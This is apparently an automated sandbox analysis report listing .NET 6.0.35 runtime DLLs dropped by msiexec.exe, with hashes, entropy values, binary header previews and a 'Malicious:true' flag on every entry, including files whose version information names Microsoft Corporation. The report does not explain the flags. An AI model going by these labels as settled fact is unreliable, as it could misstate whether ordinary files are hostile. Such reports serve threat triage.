                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...^..........." ................................................................3G....`...@......@............... ..................................4....'..8........)......$.......T...........................................................8...H............text............................... ..`.data...7...........................@....reloc..$...........................@..B............................................0.......................$.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........<.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...n.+...C.o.m.m.e.n.t.s...S.y.s.t.e.m...D.i.a.g.n.o.s.t.i.c.s...T.e.x.t.W.r.i.t.e.r.T.r.a.c.e.L.i.s.t.e.n.e.r.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...~.+...F.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tools.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6902230677661985
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:oyVTAixxeH/WQcUWyRpWjA6Kr4PFHnhWgN7aIWZBzDoSJj+iX01k9z3AmCNGuY:Nco8H/WQcUWGYA6VFHRN7oDX+iR9zZgY
                                                                                                                                                                                                                                                                                                                                  MD5:8E4C6E5CE84FBC5DAEE123ACD66AFF89
                                                                                                                                                                                                                                                                                                                                  SHA1:3729A072623C64EB9C68DAF3EB8B982990A686AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:DEFFF523549F8128A9B5ADBAA175BB186748A1DE7D3B1DD4200C0C4FF9E8257D
                                                                                                                                                                                                                                                                                                                                  SHA-512:3FF7B996FD7F1C7D230F39683847FC6D1842E844B517397284D9EF2E453739E49CC75BF6A039A073C23224BB9A54798396CA98C6CFBCCC1210BE71EFAE5177B0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3............"!..0..............*... ........@.. ..............................'W....`..................................)..K....@...................(...`.......)..8............................................ ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ..L...................P ........................................Y.%"...%Do}....$fYdO.V'1Ag.C..d.bx..1y4.,.F...<...m..)%.?.t...r.|;.i.~.M8p.....1D.|......x.O..b.H_............N..... .T.;BSJB............v4.0.30319......`.......#~..H...H...#Strings............#GUID...........#Blob......................3......................................Z.........s.........................,.....w...N.....F.....0.~...!.~.....~.....~.....~.....~.....~.....~.....~.................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TraceSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):133416
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.551188165832685
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:bHjrVA3Ua/8lVkCAnPL0FlgsMzj2OE20esM9eVriqRIL8dXmty6lH4ziWzD:bvV7a0bg4F+sAaj2SM9eVriE2ty6B+NH
                                                                                                                                                                                                                                                                                                                                  MD5:AFB7C185FC983D0533BD729B121CB108
                                                                                                                                                                                                                                                                                                                                  SHA1:6FA0484D54708288F94AA6FB0AD6BE3D5F208656
                                                                                                                                                                                                                                                                                                                                  SHA-256:61C7903D1CDA2298112BCD7A0F57F1F76548A09CE7C1DEFE8D65A6B42268B4C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:7380FBF5935FC2579E84923378A3EFA2C3D8F6E4954FF9F5D8007663B55ED33E81FE05A059A5E35A240A501BC298338FCAD885A579C78CD799CFABE47BC1D040
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ................................................................k.....`...@......@............... ......................................L@..........()..............T...............................................................H............text............................... ..`.data...............................@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...D.i.a.g.n.o.s.t.i.c.s...T.r.a.c.e.S.o.u.r.c.e.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tracing.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16648
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.721684126311085
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:X75g6pDj+ymxxdZWbBDWOpWjA6Kr4PFHnhWgN7acWJtZQcADB6ZX01k9z3Atyi:X/+yM3ZWbBDWOYA6VFHRN72WcTR9z6yi
                                                                                                                                                                                                                                                                                                                                  MD5:1C693E6B4C17658F2E2F81F245D81F53
                                                                                                                                                                                                                                                                                                                                  SHA1:C9E2D650B90D0B19642CAC32C07251E4A6443073
                                                                                                                                                                                                                                                                                                                                  SHA-256:ED823EA98320410EC6675FCB555FA34EE295081A3D7653D6CF10E5424E7F2459
                                                                                                                                                                                                                                                                                                                                  SHA-512:58600DF3D1B5B1DA028D4B8EEDC06C953DB6B940F2B9B32EDA6134B50515D7A9C3EC3B47D230FEDED12D0B3F2B6159B9EDE1CD50A880444C562B439C8E3EF82A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....V..........."!..0.............>-... ........@.. ....................................`..................................,..S....@...................)...`......0,..8............................................ ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ -......H........ ..`...................P ......................................irj.gz...a..0.*.u...3(]a.f'..Drt-.\.R......X..S....z.Y.....t2...x.X..D..7.V\.R'....,.c...m_X.n.....7..B.w.z....D...B.5BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3................................ .....................].........................................m.....q.....D...........P...........*...............................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):130312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.3785881753390115
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:b21fgY6c2/Pwp2Hj/ygb4xfHIKHnT6IdI0WkHLbjypy6hKl:y1fwyyzKHm+ljrkc
                                                                                                                                                                                                                                                                                                                                  MD5:0D17F379D5E18424C1CDBA037DFE8E02
                                                                                                                                                                                                                                                                                                                                  SHA1:F1D1FF0FD4E3A32AF9E7A2B0EB3D0FEC4586B185
                                                                                                                                                                                                                                                                                                                                  SHA-256:AE4D4D0A9018A3BEE1D1AAADE35872840223B6EA80F42F9ABC8CD94D0173582E
                                                                                                                                                                                                                                                                                                                                  SHA-512:8476EA5D21925EAC7007A0C0F48E3AB95D37B4E1C501FC321ACC41BC0D8E5FF59293EB6AB54314797759AF48997C21204BDE91014BF8C7F553F79471BAF6BC73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...;.g..........." .................................................................S....`...@......@............... ..................................8....0...........)......,.......T...........................................................8...H............text...f........................... ..`.data...f...........................@....reloc..,...........................@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):21256
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.399232557439348
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:GgyLzP7uC8sYITetzP974PbXWx/tWbYA6VFHRN7PRxB+R9zPdq:Ggy7QRN2FClPRxw9zs
                                                                                                                                                                                                                                                                                                                                  MD5:E71CD9814EAF71614068C87F69221ECD
                                                                                                                                                                                                                                                                                                                                  SHA1:28F617B40E91E60744B9259C5F9CC52F4803EAC0
                                                                                                                                                                                                                                                                                                                                  SHA-256:493CA897860F0B3698041A562A6BA871BA69AE9B2120856AD98A99BF98B9EC8A
                                                                                                                                                                                                                                                                                                                                  SHA-512:BA3205DE3FD4DBE702E088BD93B5F5CA3EB022E29775C7C5A8A20D0C416407889E4E3DD6E28BA63E7537702A2CA4329DC56F64B6CED7D93EA2BB724592DDDC38
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.. ...........>... ...@....... ..............................I+....`.................................}>..O....@..X............*...)...`.......=..T............................................ ............... ..H............text........ ... .................. ..`.rsrc...X....@......."..............@..@.reloc.......`.......(..............@..B.................>......H.......P ......................(=......................................BSJB............v4.0.30319......l.......#~......l...#Strings....|.......#US.........#GUID.......H...#Blob............T.........3..................................................................m...........#...............d.....x...........W...................................;.....~.[.......................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V...y.V.....V. ...V.....V...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Dynamic.Runtime.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16648
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.682833908003748
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:OGMeH1jyMWsmCWpYA6VFHRN7YpjNbZR9zahO:D1SFFClWjFT9z3
                                                                                                                                                                                                                                                                                                                                  MD5:0B5B4A265DF1687CD6CE5A5C0C2B257F
                                                                                                                                                                                                                                                                                                                                  SHA1:FD358CEDBDC44A8635831A27BF201E557564EC4B
                                                                                                                                                                                                                                                                                                                                  SHA-256:1CBD5B22FE6CC0701B8C0A8BDE7D47C9E98FF36F878D7AB21EF6DCC2E07031E7
                                                                                                                                                                                                                                                                                                                                  SHA-512:8764648F88EB51273A25C46E4F87E41DE3F544F56510670D1AA7C10A1393E9B647813AEDD177A7A4D0BEAEF446A7DBF20E00F884071BA4CA08A7861204D739EE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."............"!..0..............,... ........@.. ...............................e....`.................................\,..O....@...................)...`.......+..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........ ......................P ......................................u6.R6.;..$..y..3+L.,..q?-C+&Mw,me...z.....%.~...L..>.W...5.m.6........h..u.C.W....5..B..[...... ...5.;..........?B|c:c.AqBSJB............v4.0.30319......`...P...#~..........#Strings....0.......#GUID...@.......#Blob......................3......................................>.........W...............................Y...9.r...j.r.....r.....r.....r.....r.....r...w.r.....r...........#.................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Formats.Asn1.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):200456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.678151949832614
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:vfjQgR2Iits3cbSjp74Cmwkv9Rc5ff3MAdI:vfUy27tScbSjp74CmwTvM0I
                                                                                                                                                                                                                                                                                                                                  MD5:0F50B814E03E5D788050A64A02E79186
                                                                                                                                                                                                                                                                                                                                  SHA1:F4784DE5C05420D20962911E8A9C25BF4A5472EC
                                                                                                                                                                                                                                                                                                                                  SHA-256:62EE5698F9DD0429111B6E206E681774A9A61B89DE860632BA1F1E669E2B4B67
                                                                                                                                                                                                                                                                                                                                  SHA-512:1509426BD27ED3722FF8AAE7BED13FA4BF0DD51211ADE6CA7EF564782952E2A7A4DE3365253A0EB59CD66604D6689F4055AA7977F4E3792188A74316048671DF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...r............" .........(......................................................e.....`...@......@............... ......................................XO...........)........... ..T...............................................................H............text............................... ..`.data...1".......$..................@....reloc..............................@..B............................................0...........................H.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...j.....C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .c.l.a.s.s.e.s. .t.h.a.t. .c.a.n. .r.e.a.d. .a.n.d. .w.r.i.t.e. .t.h.e. .A.S.N...1. .B.E.R.,. .C.E.R.,. .a.n.d. .D.E.R. .d.a.t.a. .f.o.r.m.a.t.s...........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Calendars.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.800001141845772
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:bas74RqXWDRq4PRqm0Rq7WAYA6VFHRN7rJsYlORR9zP9pv/:1OqKqaqmuqfFClrJDK9zb/
                                                                                                                                                                                                                                                                                                                                  MD5:60EC046F6E006115F5E0F69349B66976
                                                                                                                                                                                                                                                                                                                                  SHA1:47579FAE1C87A132AAD35A7BFB00C34B03ACC3EF
                                                                                                                                                                                                                                                                                                                                  SHA-256:CA6A9C3A0F8F9A2F7310326F5B14BE7BAF5A317AD600A0516A5AF0C49D29C803
                                                                                                                                                                                                                                                                                                                                  SHA-512:A74BA829A1CDF6B32013C3572591E1AAB8D48998B97DA73E4225DA0DE9D2CBAC91D3B51951C2856E1F940639D4A398F48D6CCA0CD62AAAC8713899161997368E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....n............"!..0..............+... ........@.. ...............................#....`..................................+..W....@..................()...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P .......................................=.c'm'"0N(..|..{Z.%.3..P.G.*^...QO}....e3.W.r...............10N.g.y.j.lZ.Q.EBCI.d...i.6..K.....l<lG..Az.U]m.$...[d...G..x.BSJB............v4.0.30319......`.......#~......$...#Strings....0.......#GUID...@.......#Blob......................3................................................"...........;...........f.......,.................H...!.H.....H...[.H.....H.....H.....H...B.H...O.H...v.............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Extensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.829197730895101
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:PluRPWYRgcRp0RjW2X6HRN7wnipR9z+pt9Pa5:PaNVpupWwiD9zWnPa5
                                                                                                                                                                                                                                                                                                                                  MD5:6687C41093EC1E800065E8B9F519C85C
                                                                                                                                                                                                                                                                                                                                  SHA1:A1C75BF69C5229431DAB32AD6CAE238F5C23BC89
                                                                                                                                                                                                                                                                                                                                  SHA-256:727FCC0B9C7F2C8E442B79CB27DDFA0F77C988A3ABCAC1D8AC54B8B5D13FA2FD
                                                                                                                                                                                                                                                                                                                                  SHA-512:C85864BC5DC84D611A2F72AABAF46EB4711F824ECCA6303268C87DA702B3584D7B882C55A16824FDAD5D04F5AE91DD82461B52D1A4767B56362C18B746EB3932
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B^c..........."!..0..............)... ........@.. ...............................s....`.................................h)..S....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ......................................l./%..d...w.Ah3C....O.*.~.[....I+.....e.....S6|....q......m.Uo.....X4...Lt...{f[^X|I..o.. K.].m-...~.D......V......1aVEJ.M.3,<BSJB............v4.0.30319......`.......#~..@.......#Strings....$.......#GUID...4.......#Blob......................3..................................................P.....P...3.=...p.....^.....a.......%.....%...w.%.....%.....%...w.%.....%.....%...G.%...I.P.................7.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.722888698554338
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:amQ/APRLWdRMxRA0RHWDSYA6VFHRN7ht1t6R9z7UK9:amQ/k00AupFClht1t29zgQ
                                                                                                                                                                                                                                                                                                                                  MD5:8122E1A69A6500E33056AE1556B83C1A
                                                                                                                                                                                                                                                                                                                                  SHA1:F10E765E55F79FE056B8E0B74C3DD1A04351CFCF
                                                                                                                                                                                                                                                                                                                                  SHA-256:71B712F484C595CEE326A040C8868D11EBB8A28F8E10F58579E76C6B056ED6E7
                                                                                                                                                                                                                                                                                                                                  SHA-512:B1568DC386ACD6C1CB8C5867CADDEE680C228F04A09EFD7616C712F5B2D00EA837F90BDEA28E326750BF6AC5BA639181FCAB73AFF9C2EF73986B9A30D404FBB7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w............."!..0..............+... ........@.. ....................................`..................................*..K....@...................(...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ..D...................P .......................................7.)n..a.&.3..... ..]tM.%:.....:%.[....F.5-.....M...L[...F.k=........FZQ.e...Xx~........*.k...LPw......T\.o.{9...+=1AB.BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3......................................).........3.K.....K...L.....k.....w.......B.....,.....,.....^...2.^.....^...l.^.....^.....^.....^...S.^...`.^.....K...........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Brotli.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):72968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.528958006044264
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:alBKjElqr5dSOyXb23tCZrEp8RvVifTzb:ab4ElW5zyXb238rjViTf
                                                                                                                                                                                                                                                                                                                                  MD5:AA9B333FA47EABC7D9EAFE6FE7A263FC
                                                                                                                                                                                                                                                                                                                                  SHA1:22C6E5092A6D596737A5398F70F98503B4AA14EC
                                                                                                                                                                                                                                                                                                                                  SHA-256:11C5A8B74E363109C89697BDCAE2EC3A3AE6408FF42D502862E8A7B95E5265A2
                                                                                                                                                                                                                                                                                                                                  SHA-512:22BF2ABFDEA1FACE270E806931CD81EE174F585B59EC2E9D5478D4FDFFEBF3C6F84D8D9B0C47F1A4A833FDCBE4738596C72EC5A3B7A4B0DA7D2EF008920AD460
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....}..........." ......................................................... ......}.....`...@......@............... ..................................P...<)...........)......l.......T...........................................................P...H............text...D........................... ..`.data...............................@....reloc..l...........................@..B............................................0.......................@.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........X.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...4.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.FileSystem.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.724449548328205
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:GOPrezAaWuCmWJpWjA6Kr4PFHnhWgN7acWFv9O4x6RMySX01k9z3Ahts/a:TPcAaWuCmWJYA6VFHRN7Mv9OHMR9z2h
                                                                                                                                                                                                                                                                                                                                  MD5:1A86FF69F935493E236CE382FE70715A
                                                                                                                                                                                                                                                                                                                                  SHA1:BB0A289B47E157FFE16ECC0BF4360E1800616CCC
                                                                                                                                                                                                                                                                                                                                  SHA-256:9AFBD90627BA2A53C73D12C44DA02342899395CA847B0FAA169304C9267F8C2D
                                                                                                                                                                                                                                                                                                                                  SHA-512:0573D7D99D1735F7101F0F80D50126673A8EAA9EF9DA685489BA7F62F9455080CB7E02731960CCE94B9A88DD41A973E9773E87E49B3475372D7E50E5A1E451D4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+............." ..0..............*... ...@....... ....................................`.................................9*..O....@...................)...`......@)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................m*......H.......P ..p....................(......................................BSJB............v4.0.30319......l.......#~..t... ...#Strings............#US.........#GUID...........#Blob............T.........3....................................................I...........k...................[...+.....7...................................i...........x...........Q.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Native.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):826128
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.112403183100119
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:CJhYe83Gfyv7vrkasX8LZ6dA9NWYIAHhlyR8ZXTw05nmZfRK1o:IYXv7vr5dx9IAniAmZfREo
                                                                                                                                                                                                                                                                                                                                  MD5:83183EED671A225CACCC6335313D2179
                                                                                                                                                                                                                                                                                                                                  SHA1:9A11A9790E64443DE2C26EB52DFC6BD6C74F1558
                                                                                                                                                                                                                                                                                                                                  SHA-256:A0BF4ADBFFCDA63F954F8F5564EC53946AFCEEAA69506F17AE5DB214472C5500
                                                                                                                                                                                                                                                                                                                                  SHA-512:B2871B9DA5D2EF390EF9297D6052EA809EFE4EDEEFAAF53221B029C93C064FFB2E3499F2A8A827A8B0A0C40A441627AA4B7485C72B082F5BBAF13F5BC9E4F193
